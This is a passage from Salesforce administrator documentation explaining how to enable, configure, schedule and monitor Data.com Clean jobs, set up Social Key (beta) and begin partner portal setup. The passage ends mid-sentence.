“Manage Users”To enable Data.com Clean users:

“Download AppExchange Packages”To install AppExchange packages:

It’s easy to implement Data.com Clean. Just perform these tasks.

1. Confirm that Data.com Clean is enabled..
2. Configure your account, contact, and lead page layouts with the buttons and fields you need.
3. Update your field-level security so users see fields provided by D&B.
4. Define your preferences for which records to clean and how to clean them..
5. Schedule your Clean jobs.
6. Install the Data.com Reports package.

Once you’ve finished implementing Data.com Clean, to get the optimum benefit from the product, you should:

• Regularly review your Data.com Clean record match results to make sure records are matching as expected.

• Regularly monitor your organization’s record match and update rates and take steps to improve those rates if necessary.

If you’re using Data.com Prospector together with Data.com Clean, see Implementing Data.com Prospector on page 1407.
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If you want the option to prevent Data.com Clean jobs from automatically updating select account, contact, or lead records,
you can use the validation rule provided by Data.com Reports.

See Also:
Data.com Clean Overview
Data.com Clean Product Enablement

Data.com Clean Product Enablement
Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

User Permissions Needed

“Customize Application”To enable or disable Data.com Clean:

Data.com Clean ensures that your CRM records are always up to date. You can use Clean with all your account, contact, and
lead records—not just those added from Data.com. When you purchase the Data.com Clean product, it’s automatically enabled
for you so can set up automated Clean jobs and users can manually clean records.

Enabling Clean makes clean features available to your organization and it causes the Preferences and Jobs links to appear in
Setup at Data.com Administration > Clean.

Note:

Enabling Clean does not clean your records immediately, and you can click Disable to turn the feature off.

1. From Setup, click Data.com Administration > Clean > Settings.
2. Confirm that Data.com Clean is enabled.

See Also:
Data.com Clean Overview
Implementing Data.com Clean
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Configuring Page Layouts for Data.com Prospector and
Data.com Clean

Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

User Permissions Needed

“Customize Application”To customize page layouts:

“View Setup”To view page layouts:

When you implement Data.com Prospector and Data.com Clean, so that users can use the product, you need to add buttons
and fields to your Account, Contact, and Lead page layouts. Here’s how.

Note:  If your organization uses Professional Edition, custom page layouts and field-level security are not available,
so you must add all available Data.com fields and buttons to your page layout for each object (accounts, contacts,
leads, and D&B Companies).

1. From Setup, click Customize > Accounts > Page Layouts.
2. From the list of page layouts, click Edit next to the layout(s) your Data.com Prospector or Data.com Clean users will use.
3. On the Account Layout page, from the list of page element categories, click Fields.
4. Drag the Clean Status field into place on the page where you want it to appear.
5. If you use Data.com Corporate Prospector or Data.com Premium Prospector, add the D&B fields you want users to see.

These include Account Site, D-U-N-S Number, NAICS Code, Tradestyle, and more. For a complete list of the
D&B fields available on account records, see Account Fields.

Tip:  We recommend creating a section for D&B fields and grouping them there. To create a section, from the
Fields group, just drag the Section element into place on the page.

6. If you use the Do Not Auto-Update validation rule provided in the Data.com Reports AppExchange package, add the
Data.com Does Not Auto-Update field.

7. From the list of page element categories, click Buttons. Drag the Clean and Get Contacts buttons into place on the page.
8. Click Save.
9. From Setup, click Customize > Leads > Page Layouts.
10. Repeat the steps to add the Clean Status field and the Clean button to your Lead page layouts.
11. If you use Data.com Corporate Prospector, add the Company D-U-N-S Number field. If you use Data.com Premium

Prospector, add the Company D-U-N-S Number and D&B Company fields.
12. If you use the Do Not Auto-Update validation rule provided in the Data.com Reports AppExchange package, add the

Data.com Does Not Auto-Update field.
13. From Setup, click Customize > Contacts > Page Layouts.
14. Repeat the steps to add the Clean Status field and Clean button to your Contact page layouts. (Contacts does not

include any D&B fields.)
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15. If you use the Do Not Auto-Update validation rule provided in the Data.com Reports AppExchange package, add the
Data.com Does Not Auto-Update field.

16. If you use Data.com Premium Prospector, from Setup, click Customize > D&B Companies > Page Layouts.
17. Add the Search Global Ultimate D-U-N-S button.

See Also:
Preventing Data.com Clean Auto-Updates for Account, Contact, and Lead Records

Setting Field-Level Security for Data.com
Available in: Enterprise and Unlimited Editions

User Permissions Needed

“Customize Application”To set field-level security:

If your organization uses Data.com Prospector or Data.com Clean, you can view a number of D&B fields on account records,
and those fields are included when users manually clean records. To make sure your users can read and edit the fields and their
values, and that they appear on the Account Card, you need to set field-level security (FLS) for:

• Account Site

• D&B Company (Data.com Premium Prospector only)
• D-U-N-S Number

• NAICS Code

• NAICS Description

• Ownership

• SIC Code

• Ticker Symbol

• Tradestyle

• Year Started

There are multiple ways to set field-level security (such as by profile or permission set), but since you need to set FLS for only
ten fields, we recommend starting from the fields and choosing the user profiles for users who use Data.com.

1. From Setup, click Customize > Accounts > Fields.
2. Click the field label to open the detail page for each of the fields.
3. On each field’s detail page, click Set Field-Level Security. For each profile whose users need to read and edit the

fields, select Visible. For example, if users in the Standard User profile will use Data.com Clean, select Visible for that
profile.
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Note:  Because these fields are maintained by Data.com Clean, making them editable by setting the field-level security
to Visible could create mismatched data when a Clean job is run.

See Also:
Implementing Data.com Clean

Defining Your Data.com Clean Job Preferences (Data.com
Clean Only)

Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

User Permissions Needed

“Customize Application”To implement Data.com:

Clean preferences let you specify:

• Which objects’ records to clean with automated jobs
• How you want to clean them

Jobs can either:

• Flag all fields in a Salesforce record whose values are different from those in the matched Data.com record, or
• Flag fields with different values and also auto-fill blank fields

You can set flag-only or flag and auto-fill preferences for entire records or field by field. If you use Data.com Premium Clean,
you can also clean D&B Company records that are linked to accounts and leads. D&B Company clean jobs automatically fill
or overwrite field values on D&B company records, but do not change data on linked account or lead records.

Your preferences take effect when the next scheduled clean job runs, and users will see the flags, as appropriate, when they
clean records manually.

Note:

• Person accounts are excluded from Account and Contact clean jobs.
• Converted leads are excluded from Lead clean jobs.

1. From Setup, click Data.comAdministration > Clean > Preferences.
2. Select the Enable Clean jobs  checkbox for each object whose records you want to clean. (If you clear the Enable Clean

jobs checkbox, automated jobs will not run for objects of that type.)
3. For each object you’ve enabled, select your clean preference.

• Flag all differences per record to only identify fields whose values are different from Data.com values
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• Flag differences and auto-fill blank fields to identify fields whose values are different and fill blank
fields with values from Data.com.

• Customize settings field by field.

4. If you select the Customize option for any object, you can select either Flag or Flag & Auto-Fill for individual
fields.

5. If you use Data.com Premium Clean and want to clean D&B Company records, select the Enable Clean jobs for
D&B Companies checkbox.

6. If you want to clean account records using the D&B DUNSRight™ matching service, select that option in the account
preferences section and adjust your confidence code if needed.
D&B’s Confidence Code ranks Data.com match candidates based on how similar they are to your record, from 1 (not
similar) to 10 (identical or highly similar). We won’t automatically match any Data.com record below the code you select
here, and if we have multiple records at or above your selection, we’ll match the best quality record. When you manually
clean a record, you may be able to select a match between our preset confidence code (5) and the code you select here.

7. When you finish setting clean preferences for all the objects you want to clean, click Save.

See Also:
Scheduling Data.com Clean Jobs (Data.com Clean Only)
Cleaning Records Manually with Data.com Clean

Defining Your Data.com Account Clean Preferences
(Prospector Only)

Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

User Permissions Needed

“Customize Application”To implement Data.com:

With Data.com Prospector, your users can manually clean account, contact, and lead records. Records are matched for cleaning
by a matching service: either Data.com matching or D&B DUNSRight™ matching. Data.com matching is the default.

Before you begin, make sure you understand the two matching services, what they offer, and how they work on page 1433.

1. From Setup, click Data.com Administration > Clean > Preferences.
2. If you need to, change the matching service your organization will use to clean account records.
3. If you select the D&B DUNSRight matching service, you can adjust the D&B Confidence Code.

D&B’s Confidence Code ranks Data.com match candidates based on how similar they are to your record, from 1 (not
similar) to 10 (identical or highly similar). We won’t automatically match any Data.com record below the code you select
here, and if we have multiple records at or above your selection, we’ll match the highest quality record. When you manually
clean a record, you may be able to select a match that ranks between our preset confidence code (5) and the code you select
here.
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Understanding Data.com Clean Account Matching Services
Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

If you use Data.com Prospector or Data.com Clean, you can select the matching service your organization uses to clean account
records. Here are your options.

• Data.com matching is the default matching service used by Data.com Clean. Matches are based on the Account Name,
Billing Address, Website, and Phone fields.

• DUNSRight matching is D&B’s proprietary data-quality technology, which uses a rigorous process to normalize data and
match D&B company records to your account records. The process also employs the D&B Confidence Code, which ranks
Data.com match candidates based on how similar they are to your record, from 1 (not similar) to 10 (identical or highly
similar). D&B also provides letter-coded match grades for individual fields. For details about how D&B DUNSRight
matching works, see D&B Entity Matching.

Sync BehaviorMatching Service

Based on the schedule you select, jobs will process only records of enabled objects that have Not
Compared clean status (likely because Salesforce records have changed since the previous
job was run). This is called an incremental sync.

If you schedule jobs for at least one day of the week, the first time jobs run, and two weeks
after the previous full sync job finishes, jobs will process all records of enabled CRM objects

Data.com matching

(accounts, contacts, and leads) even if no records have changed. This type of job is called a full
sync, and it will run instead of the incremental sync at the same scheduled time.

Based on the schedule you select, jobs will process only records of enabled objects that have Not
Compared clean status (likely because Salesforce records have changed since the previous
job was run). This is called an incremental sync.

If you use DUNSRight matching, you can schedule a full sync of your account records
with Data.com’s the next time your account clean jobs run. The full sync job will

D&B DUNSRight matching

run instead of the incremental sync. After the requested full sync runs, this option is turned
off. You can turn it back on and run another full sync once every 30 days.

Before selecting a matching service, consider the following.

• Changing the matching service might affect your organization’s match rates.

• Neither matching service supports person accounts because person accounts are excluded from Clean jobs.

• If you’ll be cleaning account records from non-English speaking countries, we recommended that you use D&B DUNSRight
matching.

• Data.com Clean always uses the D-U-N-S Number field to match (or look up) accounts records. Any account record
without a D-U-N-S Number will be matched using whichever matching service was selected (either Data.com matching
or D&B DUNSRight matching).
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• If, after changing matching services, you want to do a one-time rematch using the new matching service, you can manually
remove the D-U-N-S Number on account records to force the matching service to rematch the records. Be aware that this
might affect your match rates.

• If you use DUNSRight matching, for the D-U-N-S Number field you cannot map a custom field or skip mapping. We
don’t recommend mapping a custom field or skipping mapping for either matching service: Data.com matching or
DUNSRight.

• After you select D&B DUNSRight matching, the initial match operation will take approximately one to two seconds per
record. If your organization has a large number of account records that do not have a D-U-N-S Number, it may take
several days to complete the process.

• To improve match rates when using D&B DUNSRight matching, be sure to include a valid state or province for US- and
Canadian-based account records.

• D&B DUNSRight matching provides matching records for over 200 more countries than Data.com matching. DUNSRight
matching does not support these countries and regions: Admiralty Islands; Åland Islands; Antarctica; Ascension Island;
Bonaire; Bouvet Island; British Indian Ocean Territory; Caroline Islands; Cocos (Keeling) Islands; Cuba; Curaçao; French
Southern Territories; Guernsey; Heard Island and McDonald Islands; Isle of Man; Jersey; Korea, Democratic People's
Republic of; Mayotte; Micronesia, Federated States of; Midway Islands; Mongolia; Niue; Palau; Palestinian Territory
Occupied; Pitcairn; Saint Barthélemy; Saint Eustatius and Saba; Saint Martin (French part); Sint Maarten (Dutch part);
South Georgia; South Sandwich Islands; Svalbard and Jan Mayen; Timor Liste; Turkish Cyprus; United States Minor
Outlying Islands; Wake Island; Wallis and Futuna; Western Sahara.

See Also:
Understanding How Salesforce and Data.com Records are Matched
Selecting a Data.com Clean Matching Service for Account Records
Viewing Your Data.com Clean Record Match Rates
Scheduling a Full Sync of Your Salesforce Account Records with Data.com (Data.com Clean Only)

Selecting a Data.com Clean Matching Service for Account
Records

Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

User Permissions Needed

“Customize Application”To implement Data.com:

Before you begin, make sure you understand the Data.com Clean matching services: what they offer, and how they work.

1. From Setup, click Data.com Administration > Clean > Preferences.
2. Select the matching service your organization will use to clean account records.
3. If you select the D&B DUNSRight matching service, you can adjust the Confidence Code.
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The Confidence Code is a numeric code used to group similar quality matches. The higher the code, the better quality
matches you'll see.

See Also:
Defining Your Data.com Clean Job Preferences (Data.com Clean Only)
Best Practices for Data.com Clean

Scheduling Data.com Clean Jobs (Data.com Clean Only)
Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

User Permissions Needed

“Customize Application”To schedule Data.com Clean jobs and view job history:

To keep your records’ clean status up to date, schedule automated jobs to compare your records with Data.com. Jobs are queued
according to your scheduling settings, and they run independently for accounts, contacts, and leads. If you use Data.com Social
Key, Clean jobs also run a process that finds and associates social handles for your contacts and leads.

Sync BehaviorMatching Service

Based on the schedule you select, jobs will process only records of enabled objects that have Not
Compared clean status (likely because Salesforce records have changed since the previous
job was run). This is called an incremental sync.

If you schedule jobs for at least one day of the week, the first time jobs run, and two weeks
after the previous full sync job finishes, jobs will process all records of enabled CRM objects

Data.com matching

(accounts, contacts, and leads) even if no records have changed. This type of job is called a full
sync, and it will run instead of the incremental sync at the same scheduled time.

Based on the schedule you select, jobs will process only records of enabled objects that have Not
Compared clean status (likely because Salesforce records have changed since the previous
job was run). This is called an incremental sync.

If you use DUNSRight matching, you can schedule a full sync of your account records
with Data.com’s the next time your account clean jobs run. The full sync job will

D&B DUNSRight matching

run instead of the incremental sync. After the requested full sync runs, this option is turned
off. You can turn it back on and run another full sync once every 30 days.

Jobs scheduled in a sandbox environment expire after 30 days.

Important:  If you have set up Apex triggers to run when account, contact, or lead records are updated, and your
triggers perform SOQL queries, the queries may interfere with automated Clean jobs for those objects. Your Apex
triggers (combined) should not exceed 200 SOQL queries per batch. If they do, your Clean job for that object will
fail. In addition, if your triggers are @future methods, they will be subject to a limit of 10 @future calls per batch.
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1. From Setup, click Data.com Administration > Clean > Jobs.
2. Select the days of the week when you want jobs to run.
3. Select your preferred start time.

Note:  Jobs run independently, so their exact start times may vary.

4. Click Save.

See Also:
Viewing Data.com Clean Job History
Scheduling a Full Sync of Your Salesforce Account Records with Data.com (Data.com Clean Only)
Implementing Data.com Clean

Scheduling a Full Sync of Your Salesforce Account Records with Data.com
(Data.com Clean Only)

Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

User Permissions Needed

“Customize Application”To schedule Data.com Clean jobs and view job history:

If you use the D&B DUNSRight Matching service, you can schedule a full sync of your account records with Data.com’s the
next time your account clean jobs run. The full sync compares all of your account records with records from Data.com, and
may find matches for records that were not matched during previous jobs. After the requested full sync has run, the option is
turned off. You can turn it back on and schedule another full sync every 30 days. We’ll let you know when your full sync is in
progress, or how long it’s been since your last full sync was run.

1. From Setup, click Data.com Administration > Clean > Jobs.
2. Click the button next to Full Sync With Next Job to turn full sync On.

After the requested full sync runs, the button changes to Off.

See Also:
Selecting a Data.com Clean Matching Service for Account Records
Defining Your Data.com Clean Job Preferences (Data.com Clean Only)
Scheduling Data.com Clean Jobs (Data.com Clean Only)
Data.com Social Key Overview—Beta
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Viewing Data.com Clean Job History
Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

User Permissions Needed

“Customize Application”To schedule Data.com Clean jobs and view job history:

The Clean Jobs History table lists recent clean jobs and provides related details. If a job processes any records that have either
batch or entity (record) level errors, we provide job logs with details. We store job logs for seven days.

Important:

• We don’t provide a Job Log link if a job encountered no errors.
• If you use the Do Not Auto-Update validation rule to prevent selected records from being automatically updated

by Data.com Clean jobs, make sure you understand its effects on Clean job logs. The rule generates entries and
related messages in job logs, but your jobs may generate other entries and errors, as well, so make sure you examine
your job logs carefully. The validation rule is available in the Data.com Reports AppExchange package.

1. From Setup, click Data.com Administration > Clean > Jobs.
2. View job details in the Clean Jobs History section. This table defines each column.

DefinitionColumn Heading

The date the job was run.Date

The time the job was submitted to the job queue. Jobs run
independently, so this might not be the exact time the job
was run.

Time Submitted

The type of job: for Accounts, D&B Companies, Contacts,
or Leads.

There are multiple types of account jobs.

Job Type

Account (Data.com Matching): the Data.com
matching service was used to match the account records.

Account (DUNSRight Matching): the DUNSRight
matching service was used to match the account records.

Account (D-U-N-S Number Lookup): the D-U-N-S
Number field, if present, was used to rematch (or look up)
the account records.
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DefinitionColumn Heading

The status of the job:

Queued: the job is in the queue to run. For jobs in this
status, the Time Submitted column displays a dash (–).

Job Status

Preparing: the job is being prepared to run.

Processing: the job is in process.

Completed: the job has finished running (with or without
errors).

Failed: the job failed to run.

Aborted: the job was aborted before or while it ran.

The total number of Salesforce records processed by the job.Records

The total number of Salesforce records the job matched to
Data.com records.

Matched

The total number of Salesforce records the job did not match
to Data.com records.

Unmatched

The number of Salesforce records that are marked as
Inactive in Data.com.

Inactive

The total number of batch errors a job encountered while it
ran. . A dash indicates either no errors or no data. If the job

Batch Errors

produces a batch error job log, click the link to download
and open its .csv file.

The total number of entity errors a job encountered while
it ran. A dash indicates either no errors or no data. If the

Entity Errors

job produces an entity error job log, click the link to
download and open its .csv file. There you’ll find an
explanation of any entity error that was produced because a
record failed to save—for example, because of a validation
rule failure. Entity errors usually result from validation rule
failures or required field violation. If an explanation exists,
we’ll provide it.

The unique ID of a record that produced an error during
the job. To open the record, append the 15-digit ID to the
URL of your salesforce instance. For example:
https://na1.salesforce.com/0013000000hKBTq.

If your organization uses Data.com Social key, a link to the
Social Key job log, if any, produced by Data.com Social Key.

Social Key Job Logs
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3. If the job processed one or more records, with or without errors, click the link in the appropriate column: (Batch Errors,
Entity Errors, or Social Key Job Logs) to download the job log .csv file.

See Also:
Scheduling Data.com Clean Jobs (Data.com Clean Only)
Implementing Data.com Clean
Viewing Social Key Job Logs

Viewing Your Data.com Clean Record Match Rates
Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

User Permissions Needed

“Customize Application”To view Data.com Clean match rates:

If you clean account, contact, or lead records—manually with Data.com Prospector or automatically with Data.com Clean—it’s
important that you check your match and update rates on a regular basis.

1. From Setup, click Data.com Administration > Clean > Metrics & Analytics.
2. To find out when the last calculation occurred, check the Last Calculated field above the table.

Note:  The data in the tables is calculated daily, but we store the time and calculate the date based on GMT, so
depending on time adjustments, the date shown may be different from the date when the calculations occurred.
Also, because this data is calculated once per day, it may differ slightly from the data in Data.com dashboards and
reports.

3. View match and update information in the Match and Update Rates section. Here are the definitions for the table columns.

DefinitionColumn

The object enabled for Data.com Clean: accounts, contacts,
or leads.

Records

Note:  If your Salesforce organization uses person
accounts, the figures in the Total and Processed
columns may differ. Person accounts are included
in the account total, but are not processed by
Data.com Clean jobs.

The number of object records (accounts, contacts, or leads)
that your organization has in Salesforce.

Total
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DefinitionColumn

The number of Salesforce records of each type (accounts,
contacts, or leads) processed by Data.com Clean.

Processed

The number of processed Salesforce records (accounts,
contacts, or leads) that match with Data.com records.

Matched

The number of processed Salesforce records that have been
updated either manually or via automated jobs since your
organization implemented Data.com Clean.

Updated

DefinitionColumn

The object enabled for Data.com Clean: accounts, contacts,
or leads.

Records

The percentage of processed Salesforce records (accounts,
contacts, or leads) that match with Data.com records.

Match Rate (% of Processed)

The percentage of processed Salesforce records that have
been updated either manually or via automated jobs since
your organization implemented Data.com Clean.

Update Rate (% of Processed)

See Also:
Understanding How Salesforce and Data.com Records are Matched

Installing and Implementing the Data.com Reports
AppExchange Package

Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

User Permissions Needed

“Download AppExchange Packages”To install packages:

“Customize Application”To customize page layouts:

“View Setup”To view page layouts:

The Data.com Reports AppExchange package offers:
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• Several preconfigured Data.com reports and a corresponding set of analytics and impact dashboards. Use these tools to
monitor the impact of Data.com data on your leads, forecast, and revenue.

• A custom field you can add to your account, contact, and lead page layouts to identify the records you don’t want
auto-updated by Data.com Clean jobs; and a validation rule that identifies attempted auto-updates on fields within those
records. The validation rule tells the clean job to skip those records.

Important:  Starting July 1, 2012, this package will not be compatible with the Jigsaw for Salesforce AppExchange
package.

1. Go to the Data.com Reports AppExchange page to download the package.
2. Install the Data.com Reports package.
3. If your organization uses Professional Edition, add these fields to your page layouts.

FieldsPage Layout

Added from Data.com

Data.com Managed

Account

Data.com Matched

Added from Data.com

Data.com Managed

Contact

Added from Data.com

Data.com Managed

Lead

Added from Data.comOpportunity

4. Let your users know that the Data.com reports and dashboards are available.
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Best Practices for Data.com Clean
Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

User Permissions Needed

“Customize Application”To implement Data.com Clean:

“Data Export”To back up data:

“Customize Application”To set field history tracking:

“Customize Application”To set field-level security:

Here are some tips and best practices for implementing, monitoring, and working with Data.com Clean.

• Understand how matching works.

• Use your sandbox environment to try out the automated clean jobs before running them in your production org with live
data:

After Data.com Clean is provisioned in your production org, refresh your sandbox so it has the same permissions and data.
Then follow the steps in Implementing Data.com Clean to set up Clean in your sandbox. If everything runs smoothly in
your sandbox environment, follow the same implementation steps in your production org.

• Check your match and update rates on the Clean Metrics & Analytics page. There, you’ll find information about the total
number of records cleaned, how many have been matched, and how many have been updated. Figures represent records
processed manually and automatically, and reflect your rates since your organization implemented Data.com Clean.

• Schedule regular backups of your account, contact, and lead data. It’s always a good practice, and if your Salesforce records
are ever matched inappropriately, you can revert to previous versions. Backups are most important if you use automated
clean jobs that auto-fill blank fields.

• Set up field history tracking for accounts, contacts, and leads. Field history tracking helps you identify changes to field
values, and tracks who made changes and when. If you use field history tracking, make sure you add the Account History,
Contact History, and Lead History related lists to those objects’ respective page layouts.

See Also:
Data.com Clean Overview
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Preventing Data.com Clean Auto-Updates for Account,
Contact, and Lead Records

Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

User Permissions Needed

“Customize Application”To implement Data.com:

“Manage Users”To enable Data.com users:

“Download AppExchange Packages”To install AppExchange packages:

You can prevent individual account, contact, and lead records from having blank fields filled with Data.com data when
automated Clean jobs are run. To do so, download and install the Data.com Reports AppExchange package. It provides a
custom field you add to your page layouts to identify the records you don’t want auto-updated, and a validation rule that
identifies attempted auto-updates on fields within those records. The validation rule tells the clean job to skip those records.

Important:  If you use the Block Auto-Update validation rule, keep this best practice in mind.

• This validation rule generates entries and related messages in Data.com Clean job logs, but your jobs may generate
other entries and errors, as well, so make sure you examine your job logs carefully.

1. Download and install the Data.com Reports AppExchange package.
2. For each object you run Clean jobs on, edit your page layouts to add the Data.com Does Not Auto-Update checkbox,

so it’s available to users.

Tip:  You can use the Data Loader or a custom trigger to select this checkbox for multiple records.

3. Open each record that you do not want to be auto-updated, and select the Do Not Auto-Update checkbox.
When automated jobs run, for each record that is not updated, you’ll see a message in the job log: “This record has
been excluded from automated field updates from Data.com Clean jobs.”

See Also:
Data.com Clean Overview
Defining Your Data.com Clean Job Preferences (Data.com Clean Only)
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LETTING YOUR USERS GET SOCIAL NETWORK INFO FOR THEIR
CONTACTS AND LEADS

Data.com Social Key Overview—Beta
Social Key available in: Professional, Enterprise, and Unlimited Editions

Note:

This release contains a Beta version of Data.com Social Key that is production quality but has known limitations.

Data.com Social Key works with Social Accounts and Contacts and Data.com Clean to make it easier to learn more about
your contacts and leads right within Salesforce or on social network sites.

From Social Accounts and Contacts, select the social networks you want. From Data.com Clean, enable and schedule automated
clean jobs. During Clean jobs, the Social Key process finds and associates social handles for your contacts and leads. Social
Key currently provides social handles for LinkedIn®, Twitter®, and Facebook®, for contacts and leads in the United States
only.

Users can log in to a social network from a contact or lead’s detail page and view the associated profile from within the Social
Accounts and Contacts viewer. There’s no manual search required. If we’ve found more than one potential profile for a contact
or lead, we’ll let users view and associate the one they want.

Your organization must have Data.com Clean enabled to use Social Key.

Note:  Depending on contacts’s and leads’ privacy settings, as well as the permissions set by their friends or connections
and the site’s terms of use, users may not see as much information as they would if logged directly into their social
network accounts.

See Also:
Implementing Social Key
Data.com Clean Overview
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Implementing Social Key
Social Key available in: Professional, Enterprise, and Unlimited Editions

User Permissions Needed

“Customize Application”To implement Social Key:

Social Key works with Social Accounts and Contacts and Data.com Clean to make it easier to follow your contacts and leads
on social networks. From Social Accounts and Contacts, select the social networks you want. During Clean jobs, the Social
Key process finds and associates social handles for your contacts and leads. From a contact or lead's detail page, you can quickly
view their profile within Salesforce or on a social network site. Social Key currently provides social handles for LinkedIn®,
Twitter®, and Facebook®, for contacts and leads in the United States only.

If you want to participate in our Beta program, just let us know. When you’re ready to set up Social Key, here’s what you need
to do.

1. Enable Social Key.
2. If you haven’t yet, enable Social Accounts and Contacts and select the social networks you want to get social profiles from.
3. Make sure your Data.com Clean settings, preferences, and job schedule are configured for Social Key.
4. After jobs have run, you can check out their Social Key job logs.

Enabling Social Key
Social Key available in: Professional, Enterprise, and Unlimited Editions

User Permissions Needed

“Customize Application”To implement Social Key:

1. From Setup, click Data.com Administration > Social Key > Settings.
2. Click Enable Social Key.

If you also need to enable and set up Social Accounts and Contacts, we’ll let you know after you enable Social Key.

See Also:
Implementing Social Key
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Configuring Data.com Clean for Social Key
Social Key available in: Professional, Enterprise, and Unlimited Editions

User Permissions Needed

“Customize Application”To implement Social Key:

Social Key works with Social Accounts and Contacts and Data.com Clean to make it easier to follow your contacts and leads
on social networks. From Social Accounts and Contacts, select the social networks you want. The Social Key process runs
during your automated Clean jobs, so to use Social Key, you need to make sure Clean is enabled, and select and schedule the
jobs you’ll need.

When you enable Social Key, the next scheduled Clean job will run a full sync with Data.com for the objects you’ve enabled
for clean jobs (contacts, leads, or both). Social Key will provide social handles at regular intervals after that, at the same time
as your Clean jobs. For example, if you run your clean jobs once per week, on Wednesday, the Social Key job will do a full
sync every other Wednesday.

Note: If a Clean job fails, the Social Key process fails, as well. To view Clean job history and Social Key job logs,
from Setup, click Data.com Administration > Clean > Jobs..

If you need guidance on setting up Data.com Clean or verifying your preferences or settings, just click Help for this Page on
any Clean setup page.

1. From Setup, click Data.com Administration > Clean > Settings.
2. Confirm that Data.com Clean is enabled.
3. From Setup, click Data.com Administration > Clean > Preferences.
4. Confirm that Clean jobs are enabled for the objects for which you want to get social handles. We provide them for contacts

and leads.
5. From Setup, click Data.com Administration > Clean > Jobs.
6. Confirm that Clean jobs are scheduled.

See Also:
Implementing Social Key
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Viewing Social Key Job Logs
Social Key available in: Professional, Enterprise, and Unlimited Editions

User Permissions Needed

“Customize Application”To implement Social Key:

Data.com Social Key runs a process during automated Data.com Clean jobs to find and associate social handles for contacts
and leads. You can view Social Key job logs, if any are produced, from the Data.com Clean Jobs page. If a Clean job fails, the
Social Key process fails, as well.

1. From Setup, click Data.com Administration > Clean > Jobs.
2. Review general Clean job history if you need to.
3. If the Clean job processed one or more records, with or without errors, click the View link in the Social Key Job Logs

column to download the job log .csv file.

Definition and Troubleshooting GuidelinesColumn Heading

The number of Salesforce records processed by the Clean
job.

Records

The number of Salesforce records processed for which the
job attempted to append one or more social handles.

Records with Handle

The number of Salesforce records processed for which the
job appended no social handles.

Records without Handle

The number of LinkedIn social handles the job attempted
to append to Salesforce records.

LinkedIn Handles

The number of Twitter social handles the job attempted to
append to Salesforce records.

Twitter Handles

The number of Facebook social handles the job attempted
to append to Salesforce records.

Facebook Handles

The number of errors the job encountered while attempting
to find or append social handles to the Salesforce records
processed.

Errors

An explanation of any error the Social Key process produced.Error Message

See Also:
Implementing Social Key
Viewing Data.com Clean Job History
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LETTING USERS SHARE INFORMATION WITH PARTNERS

Partner Portals Overview
You can create partner portals to help you better manage your partners.

The following table briefly describes the partner portal:

Partner Portal

Provides your business partners access to Salesforce data that
you have made available to them

Purpose

Includes a highly customizable user interface using a
point-and-click editor, and functionality similar to Salesforce,

User Interface

such as: permissions, custom objects, sharing rules, and Web
tabs

Accounts, contacts, documents, ideas, leads, opportunities,
solutions, and custom objects

Supported Record Types

Contact salesforce.com for more informationQuantity

Administrators can:Administrator Controls
• Generate partner portal usernames and passwords
• Manage the information of partner portal users
• Manage partner portal users using permissions, roles, and

sharing rules

Partner users can update their own user informationUser Controls

See Also:
Partner Portal Overview
Enabling the Partner Portal
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Setting Up Your Partner Portal
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To set up a partner portal:

Note: Starting in Summer ’13, the partner portal is no longer available for organizations that aren’t currently using
it. Existing organizations continue to have full access. If you don’t have a partner portal, but want to easily share
records and information with your partners, try Communities.

Existing organizations using partner portals may continue to use their partner portals or transition to Communities.
Contact your Salesforce Account Executive for more information.

To set up your partner portal:

1. Create one or more portals.

For each portal:

a. Configure the settings and communication templates.

The Convert Portal User Access wizard automatically displays after the first time you save settings for your first portal,
whether it is the Customer Portal or partner portal. You can use this wizard to help ensure that records and folders
owned by Salesforce users are not shared with portal users.

b. Customize the fonts and colors.
c. Customize the available tabs and tab order.
d. Configure portal languages.

2. Optionally, enable Salesforce CRM Content, Salesforce Knowledge, Entitlement Management, Ideas, or Answers as
needed.

3. Create partner profiles.

For each partner profile:

a. Customize page layouts.
b. Customize list views.

Partner portal users can automatically see any list view with visibility settings marked This view is accessible
by all users. We recommend that you create specific list views on all objects accessible to portal users, and then
assign portal users to only the list views you want them to view.

c. Customize search layouts.

The search layouts in your Salesforce organization are the same search layouts used in your partner portal. Verify that
search layouts on objects accessible to portal users only include fields you want them to view in search results.

4. Assign partner profiles to partner portals.
5. Optionally, enable single sign-on.
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6. Enable login on each partner portal.
7. Create partner users.

See Also:
Partner Portal Overview
Enabling the Partner Portal

Creating Partner Portals

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To create partner portals:

Note: Starting in Summer ’13, the partner portal is no longer available for organizations that aren’t currently using
